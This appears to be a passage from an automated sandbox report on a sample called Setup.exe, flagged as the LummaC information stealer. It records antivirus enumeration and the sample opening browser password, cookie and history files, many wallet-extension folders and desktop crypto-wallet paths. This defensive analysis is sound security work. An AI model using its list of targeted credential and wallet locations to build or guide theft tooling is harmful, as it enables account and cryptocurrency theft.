Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Setup.exe, 00000000.00000003.1916107528.0000000003BC7000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1916297501.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1916297501.0000000000E6C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1940166955.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963531213.0000000000E87000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Setup.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Setup.exe

File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
